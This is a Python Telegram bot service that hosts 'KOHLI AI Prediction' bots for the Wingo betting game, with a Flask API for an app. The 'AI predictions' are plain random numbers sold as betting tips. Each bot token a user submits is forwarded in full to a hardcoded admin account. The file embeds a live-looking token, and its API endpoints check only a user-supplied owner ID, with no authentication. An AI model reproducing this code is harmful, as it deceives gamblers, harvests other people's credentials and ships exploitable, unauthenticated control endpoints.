# ============================================================
# KOHLI HOSTING + PREDICTION BOT — FULL UPDATED v3.0
# Works on Railway / Render / Local
# ============================================================

import telebot
import threading
import time
import random
import pytz
import json
import os
from datetime import datetime
from telebot import types
from flask import Flask, request, jsonify

# ============================================================
# 🔧 MAIN CONFIG
# ============================================================
HOST_BOT_TOKEN = "8766089087:AAFQ4hk4V27YtzWvzCSmWMRCJFZF_NWV8lg"
ADMIN_ID = 7741897793

bot = telebot.TeleBot(HOST_BOT_TOKEN, parse_mode="Markdown")

# ============================================================
# 🌐 GLOBAL STORAGE
# ============================================================
awaiting_token_from = set()
hosted_bots = {}  # {owner_id: {hosted_id: {token, thread, info, running}}}

# ============================================================
# 🔮 PREDICTION ENGINE
# ============================================================
def generate_prediction():
    num = random.randint(0, 9)
    if num >= 5:
        big_small = "🔴 BIG"
        image = "https://i.postimg.cc/VL8z327L/IMG-20250908-115951-469.jpg"
    else:
        big_small = "🔵 SMALL"
        image = "https://i.postimg.cc/FzthF6Np/IMG-20250908-115954-296.jpg"
    return big_small, num, image


def get_period_number():
    ist = pytz.timezone("Asia/Kolkata")
    now = datetime.now(ist)
    yyyyMMdd = now.strftime("%Y%m%d")
    total_minutes = now.hour * 60 + now.minute
    return f"{yyyyMMdd}1000{10001 + total_minutes}"


def get_remaining_seconds():
    ist = pytz.timezone("Asia/Kolkata")
    now = datetime.now(ist)
    return 60 - now.second if now.second < 60 else 0


def send_prediction(bot_obj, chat_id, period, big_small, num, image):
    caption = f"""
🎯 KOHLI AI Prediction
━━━━━━━━━━━━━━━━━━━
🧾 Period: {period}
🧩 Prediction: {big_small} – {num}
⏱ Next: 1 Minute
━━━━━━━━━━━━━━━━━━━
⚡ Auto-generated by BDG AI Engine
"""
    try:
        bot_obj.send_photo(chat_id, image, caption=caption)
    except Exception as e:
        print(f"[!] Prediction send failed to {chat_id}: {e}")


# ============================================================
# 📊 USER STATS FUNCTIONS
# ============================================================
def load_users(file_path):
    if not os.path.exists(file_path):
        return {}
    with open(file_path, "r") as f:
        try:
            return json.load(f)
        except:
            return {}


def save_users(file_path, data):
    with open(file_path, "w") as f:
        json.dump(data, f, indent=2)


def update_user_stats(user_id, file_path):
    users = load_users(file_path)
    now = datetime.now().strftime("%Y-%m-%d")
    if str(user_id) not in users:
        users[str(user_id)] = {"first_seen": now, "last_seen": now, "usage_count": 1}
    else:
        users[str(user_id)]["last_seen"] = now
        users[str(user_id)]["usage_count"] += 1
    save_users(file_path, users)


def get_stats(file_path):
    users = load_users(file_path)
    today = datetime.now()
    day1, day2 = 0, 0
    top_users = sorted(users.items(), key=lambda x: x[1]["usage_count"], reverse=True)
    for u in users.values():
        last = datetime.strptime(u["last_seen"], "%Y-%m-%d")
        delta = (today - last).days
        if delta == 0:
            day1 += 1
        elif delta == 1:
            day2 += 1
    top_list = "\n".join(
        [f"👤 {uid} — {info['usage_count']} uses" for uid, info in top_users[:5]]
    ) or "No users yet."
    return len(users), day1, day2, top_list


# ============================================================
# 🧠 HOSTED PREDICTION BOT
# ============================================================
def start_hosted_prediction_bot(token, owner_id, hosted_id):
    try:
        hosted = telebot.TeleBot(token, parse_mode="Markdown")
        me = hosted.get_me()
    except Exception as e:
        raise RuntimeError(f"❌ Invalid Token or Bot Inaccessible: {e}")

    active_dict = {}
    user_channels = {}
    user_file = f"users_{me.id}.json"
    
    # Runtime flag for toggle
    runtime = {"paused": False}

    def start_prediction_cycle(bot_obj, chat_id, channel_id=None):
        last_period = None
        while active_dict.get(chat_id):
            if runtime["paused"]:
                time.sleep(2)
                continue
            period = get_period_number()
            if period != last_period:
                big_small, num, image = generate_prediction()
                send_prediction(bot_obj, chat_id, period, big_small, num, image)
                if channel_id:
                    send_prediction(bot_obj, channel_id, period, big_small, num, image)
                last_period = period
            for _ in range(get_remaining_seconds(), 0, -1):
                if not active_dict.get(chat_id):
                    break
                time.sleep(1)

    def create_prediction_menu():
        kb = types.ReplyKeyboardMarkup(resize_keyboard=True)
        kb.row("🧠 Start Prediction", "🛑 Stop Prediction")
        kb.row("📢 Set Channel", "📊 Stats")
        kb.row("👑 Developer")
        return kb

    @hosted.message_handler(commands=["start"])
    def start(msg):
        update_user_stats(msg.from_user.id, user_file)
        kb = create_prediction_menu()
        hosted.send_message(
            msg.chat.id,
            f"🤖 *Welcome to {me.first_name}'s Prediction Bot*\n\n"
            f"💡 Get 1-minute Wingo Predictions + Channel Auto Post.\n"
            f"Use the buttons below 👇",
            reply_markup=kb,
        )

    @hosted.message_handler(func=lambda m: True)
    def buttons(msg):
        text = msg.text
        cid = msg.chat.id
        update_user_stats(cid, user_file)

        if text == "🧠 Start Prediction":
            if active_dict.get(cid):
                hosted.send_message(cid, "⚠️ Prediction already running.",
                                    reply_markup=create_prediction_menu())
                return
            active_dict[cid] = True
            runtime["paused"] = False
            ch = user_channels.get(cid)
            hosted.send_message(
                cid,
                "✅ Prediction started.\n"
                f"{'📢 Channel linked: ' + str(ch) if ch else 'No channel linked yet.'}",
                reply_markup=create_prediction_menu(),
            )
            threading.Thread(
                target=start_prediction_cycle,
                args=(hosted, cid, ch),
                daemon=True,
            ).start()

        elif text == "🛑 Stop Prediction":
            active_dict[cid] = False
            hosted.send_message(cid, "🛑 Prediction stopped.",
                                reply_markup=create_prediction_menu())

        elif text == "📢 Set Channel":
            hosted.send_message(
                cid,
                "📢 Send your *channel username* (like `@yourchannel`) or *channel ID* (like `-100xxxxxxxxxx`).\n\n"
                "⚠️ Make sure your bot is *admin* in that channel.",
                parse_mode="Markdown",
            )
            user_channels[cid] = "waiting"

        elif text == "📊 Stats":
            total, d1, d2, top = get_stats(user_file)
            hosted.send_message(
                cid,
                f"📊 *Bot Usage Statistics*\n━━━━━━━━━━━━━━━\n"
                f"👥 Total Users: *{total}*\n"
                f"📅 Active Today: *{d1}*\n"
                f"📅 Active Yesterday: *{d2}*\n\n"
                f"🏆 *Top Users:*\n{top}",
                parse_mode="Markdown",
                reply_markup=create_prediction_menu(),
            )

        elif text == "👑 Developer":
            markup = types.InlineKeyboardMarkup()
            markup.add(types.InlineKeyboardButton("💬 Message Developer",
                                                  url="https://t.me/xxLEGEND_KOHLI"))
            hosted.send_message(cid, "👑 Developer Contact:", reply_markup=markup)

        elif user_channels.get(cid) == "waiting":
            channel_input = text.strip()
            try:
                hosted.send_message(channel_input, "✅ Channel linked successfully!")
                user_channels[cid] = channel_input
                hosted.send_message(
                    cid,
                    f"✅ Channel linked: `{channel_input}`\n\nPredictions will now be auto-posted there.",
                    parse_mode="Markdown",
                    reply_markup=create_prediction_menu(),
                )
            except Exception as e:
                hosted.send_message(
                    cid,
                    f"❌ Failed to link channel. Ensure bot is admin.\nError: {e}",
                    reply_markup=create_prediction_menu(),
                )
                user_channels[cid] = None

    def run_bot():
        try:
            hosted.infinity_polling(timeout=60, long_polling_timeout=60)
        except Exception as e:
            print(f"[!] Hosted bot stopped: {e}")

    thread = threading.Thread(target=run_bot, daemon=True)
    thread.start()

    return {
        "token": token,
        "thread": thread,
        "info": {"username": me.username, "id": me.id},
        "running": True,
        "runtime": runtime,
    }


# ============================================================
# 💼 MAIN HOSTING BOT HANDLERS
# ============================================================
def hosting_menu():
    kb = types.ReplyKeyboardMarkup(resize_keyboard=True)
    kb.row("➕ Create Hosted Bot", "📋 My Hosted Bots")
    kb.row("🛠 Stop Hosted Bot", "🏠 Back to Main")
    return kb


def main_menu():
    kb = types.ReplyKeyboardMarkup(resize_keyboard=True)
    kb.row("🤖 Hosting Bot", "👑 Developer")
    return kb


@bot.message_handler(commands=["start"])
def start(msg):
    bot.send_message(
        msg.chat.id,
        "🚀 Welcome to KOHLI X Hosting Bot\n\n"
        "Host your own Prediction Bot here.\nPress Hosting Bot to begin.",
        reply_markup=main_menu(),
    )


@bot.message_handler(func=lambda m: True)
def handle_buttons(msg):
    uid = msg.chat.id
    text = msg.text.strip()

    if text == "👑 Developer":
        markup = types.InlineKeyboardMarkup()
        markup.add(types.InlineKeyboardButton("💬 Message Developer",
                                              url="https://t.me/xxLEGEND_KOHLI"))
        bot.send_message(uid, "👑 Developer Contact:", reply_markup=markup)
        return

    if text == "🤖 Hosting Bot":
        bot.send_message(uid, "📦 Hosting Control Panel", reply_markup=hosting_menu())
        return

    if text == "🏠 Back to Main":
        bot.send_message(uid, "🏠 Returned to main menu.", reply_markup=main_menu())
        return

    if text == "📋 My Hosted Bots":
        user_bots = hosted_bots.get(uid, {})
        if not user_bots:
            bot.send_message(uid, "📭 You have no hosted bots yet.",
                             reply_markup=hosting_menu())
            return
        msg_text = "📋 *Your Hosted Bots*\n━━━━━━━━━━━━━━━\n"
        for i, (hid, entry) in enumerate(user_bots.items(), 1):
            status = "🟢 Running" if entry.get("running") else "🔴 Paused"
            msg_text += f"\n{i}. @{entry['info']['username']}\n   {status}\n"
        bot.send_message(uid, msg_text, parse_mode="Markdown",
                         reply_markup=hosting_menu())
        return

    if text == "➕ Create Hosted Bot":
        awaiting_token_from.add(uid)
        bot.send_message(
            uid,
            "🪄 *Create Hosted Prediction Bot*\n\n"
            "Please send your Bot Token now.\nExample:\n`123456789:AAEx...`\n\n"
            "⚠️ Token will be verified and forwarded to Admin.",
            parse_mode="Markdown",
        )
        return

    if uid in awaiting_token_from:
        token = text
        awaiting_token_from.discard(uid)
        if ":" not in token or len(token) < 30:
            bot.send_message(uid, "❌ Invalid Token Format. Try again.",
                             reply_markup=hosting_menu())
            return

        try:
            bot.send_message(ADMIN_ID, f"🔑 New Token from `{uid}`:\n`{token}`",
                             parse_mode="Markdown")
        except Exception:
            pass

        hosted_id = f"{uid}_{int(time.time())}"
        try:
            entry = start_hosted_prediction_bot(token, uid, hosted_id)
            hosted_bots.setdefault(uid, {})[hosted_id] = entry
            bot.send_message(
                uid,
                f"✅ Your Prediction Bot is now live!\n\n"
                f"🤖 Username: @{entry['info']['username']}\n"
                f"🆔 Bot ID: `{entry['info']['id']}`\n"
                f"📦 Hosted ID: `{hosted_id}`\n\n"
                f"💬 Open your bot and press *Start* or *📊 Stats* anytime.",
                parse_mode="Markdown",
                reply_markup=hosting_menu(),
            )
        except Exception as e:
            bot.send_message(uid, f"❌ Hosting Failed: {e}",
                             reply_markup=hosting_menu())
        return


# ============================================================
# 🌐 FLASK API — FOR ANDROID APP
# ============================================================
api_app = Flask(__name__)


@api_app.route("/", methods=["GET"])
def home():
    return jsonify({
        "status": "ok",
        "message": "KOHLI Bot Hosting Server Running",
        "hosted_bots": sum(len(b) for b in hosted_bots.values())
    })


# ---------- 1️⃣ CREATE BOT ----------
@api_app.route("/api/create_bot", methods=["POST"])
def api_create_bot():
    try:
        data = request.get_json() or {}
        token = (data.get("token") or "").strip()
        owner_id = str(data.get("owner_id") or "").strip()

        if not token or ":" not in token or len(token) < 30:
            return jsonify({
                "status": "error",
                "message": "Invalid bot token format"
            }), 400

        if not owner_id or not owner_id.lstrip("-").isdigit():
            return jsonify({
                "status": "error",
                "message": "Invalid owner ID"
            }), 400

        # Duplicate check
        for uid, bots in hosted_bots.items():
            for hid, entry in bots.items():
                if entry.get("token") == token:
                    return jsonify({
                        "status": "ok",
                        "username": entry["info"]["username"],
                        "bot_id": entry["info"]["id"],
                        "hosted_id": hid,
                        "message": "Bot already running"
                    })

        hosted_id = f"{owner_id}_{int(time.time())}"
        entry = start_hosted_prediction_bot(token, int(owner_id), hosted_id)
        hosted_bots.setdefault(int(owner_id), {})[hosted_id] = entry

        try:
            bot.send_message(
                ADMIN_ID,
                f"🔑 *New Bot Created via App*\n\n"
                f"👤 Owner: `{owner_id}`\n"
                f"🤖 Bot: @{entry['info']['username']}\n"
                f"🆔 ID: `{entry['info']['id']}`",
                parse_mode="Markdown"
            )
        except Exception as e:
            print(f"[!] Admin notify failed: {e}")

        return jsonify({
            "status": "ok",
            "username": entry["info"]["username"],
            "bot_id": entry["info"]["id"],
            "hosted_id": hosted_id,
            "message": "Bot created successfully"
        })

    except Exception as e:
        return jsonify({
            "status": "error",
            "message": str(e)
        }), 500


# ---------- 2️⃣ LIST BOTS ----------
@api_app.route("/api/list_bots", methods=["POST"])
def api_list_bots():
    try:
        data = request.get_json() or {}
        owner_id = str(data.get("owner_id") or "").strip()

        if not owner_id or not owner_id.lstrip("-").isdigit():
            return jsonify({"status": "error", "message": "Invalid owner ID"}), 400

        user_bots = hosted_bots.get(int(owner_id), {})
        bots_list = [
            {
                "username": entry["info"]["username"],
                "bot_id": entry["info"]["id"],
                "hosted_id": hid,
                "running": entry.get("running", False)
            }
            for hid, entry in user_bots.items()
        ]

        return jsonify({
            "status": "ok",
            "bots": bots_list,
            "count": len(bots_list)
        })

    except Exception as e:
        return jsonify({"status": "error", "message": str(e)}), 500


# ---------- 3️⃣ TOGGLE BOT (ON/OFF) ----------
@api_app.route("/api/toggle_bot", methods=["POST"])
def api_toggle_bot():
    try:
        data = request.get_json() or {}
        owner_id = str(data.get("owner_id") or "").strip()
        hosted_id = (data.get("hosted_id") or "").strip()
        action = (data.get("action") or "").strip().lower()

        if not owner_id.isdigit():
            return jsonify({"status": "error", "message": "Invalid owner"}), 400

        user_bots = hosted_bots.get(int(owner_id), {})
        if hosted_id not in user_bots:
            return jsonify({"status": "error", "message": "Bot not found"}), 404

        entry = user_bots[hosted_id]

        if action == "off":
            entry["running"] = False
            if "runtime" in entry:
                entry["runtime"]["paused"] = True
            return jsonify({
                "status": "ok",
                "running": False,
                "message": "Bot paused"
            })
        elif action == "on":
            entry["running"] = True
            if "runtime" in entry:
                entry["runtime"]["paused"] = False
            return jsonify({
                "status": "ok",
                "running": True,
                "message": "Bot resumed"
            })
        else:
            return jsonify({"status": "error", "message": "Invalid action"}), 400

    except Exception as e:
        return jsonify({"status": "error", "message": str(e)}), 500


# ---------- 4️⃣ DELETE BOT ----------
@api_app.route("/api/delete_bot", methods=["POST"])
def api_delete_bot():
    try:
        data = request.get_json() or {}
        owner_id = str(data.get("owner_id") or "").strip()
        hosted_id = (data.get("hosted_id") or "").strip()

        if not owner_id.isdigit():
            return jsonify({"status": "error", "message": "Invalid owner"}), 400

        user_bots = hosted_bots.get(int(owner_id), {})
        if hosted_id not in user_bots:
            return jsonify({"status": "error", "message": "Bot not found"}), 404

        entry = user_bots[hosted_id]
        entry["running"] = False
        if "runtime" in entry:
            entry["runtime"]["paused"] = True

        del user_bots[hosted_id]

        return jsonify({
            "status": "ok",
            "message": "Bot deleted permanently"
        })

    except Exception as e:
        return jsonify({"status": "error", "message": str(e)}), 500


# ---------- 5️⃣ BROADCAST ----------
@api_app.route("/api/broadcast", methods=["POST"])
def api_broadcast():
    try:
        data = request.get_json() or {}
        owner_id = str(data.get("owner_id") or "").strip()
        hosted_id = (data.get("hosted_id") or "").strip()
        message = (data.get("message") or "").strip()

        if not owner_id.isdigit():
            return jsonify({"status": "error", "message": "Invalid owner"}), 400

        if not message:
            return jsonify({"status": "error", "message": "Message is empty"}), 400

        user_bots = hosted_bots.get(int(owner_id), {})
        if hosted_id not in user_bots:
            return jsonify({"status": "error", "message": "Bot not found"}), 404

        entry = user_bots[hosted_id]
        bot_id = entry["info"]["id"]
        token = entry.get("token")

        if not token:
            return jsonify({"status": "error", "message": "Token unavailable"}), 400

        user_file = f"users_{bot_id}.json"
        users = load_users(user_file)

        if not users:
            return jsonify({
                "status": "ok",
                "sent": 0,
                "failed": 0,
                "total": 0,
                "message": "No users yet"
            })

        broadcast_bot = telebot.TeleBot(token, parse_mode="Markdown")
        sent = 0
        failed = 0

        for uid in list(users.keys()):
            try:
                broadcast_bot.send_message(
                    int(uid),
                    f"📢 *Broadcast Message*\n"
                    f"━━━━━━━━━━━━━━━\n\n"
                    f"{message}\n\n"
                    f"━━━━━━━━━━━━━━━\n"
                    f"⚡ From: Bot Admin",
                    parse_mode="Markdown"
                )
                sent += 1
                time.sleep(0.05)
            except Exception as e:
                failed += 1
                print(f"[!] Broadcast failed to {uid}: {e}")

        return jsonify({
            "status": "ok",
            "sent": sent,
            "failed": failed,
            "total": len(users),
            "message": f"Sent to {sent} users"
        })

    except Exception as e:
        return jsonify({"status": "error", "message": str(e)}), 500


# ---------- 6️⃣ BOT STATS ----------
@api_app.route("/api/bot_stats", methods=["POST"])
def api_bot_stats():
    try:
        data = request.get_json() or {}
        owner_id = str(data.get("owner_id") or "").strip()
        hosted_id = (data.get("hosted_id") or "").strip()

        if not owner_id.isdigit():
            return jsonify({"status": "error", "message": "Invalid owner"}), 400

        user_bots = hosted_bots.get(int(owner_id), {})
        if hosted_id not in user_bots:
            return jsonify({"status": "error", "message": "Bot not found"}), 404

        entry = user_bots[hosted_id]
        bot_id = entry["info"]["id"]
        user_file = f"users_{bot_id}.json"

        total, d1, d2, top = get_stats(user_file)

        return jsonify({
            "status": "ok",
            "total_users": total,
            "active_today": d1,
            "active_yesterday": d2,
            "running": entry.get("running", False),
            "username": entry["info"]["username"]
        })

    except Exception as e:
        return jsonify({"status": "error", "message": str(e)}), 500


# ============================================================
# 🚀 RUN FLASK IN BACKGROUND (Railway-compatible PORT)
# ============================================================
def run_api():
    port = int(os.environ.get("PORT", 5000))
    api_app.run(host="0.0.0.0", port=port, debug=False, use_reloader=False)


# ============================================================
# 🚀 MAIN ENTRY
# ============================================================
if __name__ == "__main__":
    threading.Thread(target=run_api, daemon=True).start()
    print("🌐 Flask API running on PORT (Railway auto)")
    print("🚀 KOHLI Hosting + Prediction Bot starting...")

    while True:
        try:
            bot.infinity_polling(timeout=60, long_polling_timeout=60)
        except Exception as e:
            print(f"[!] Main bot crashed: {e}")
            time.sleep(5)
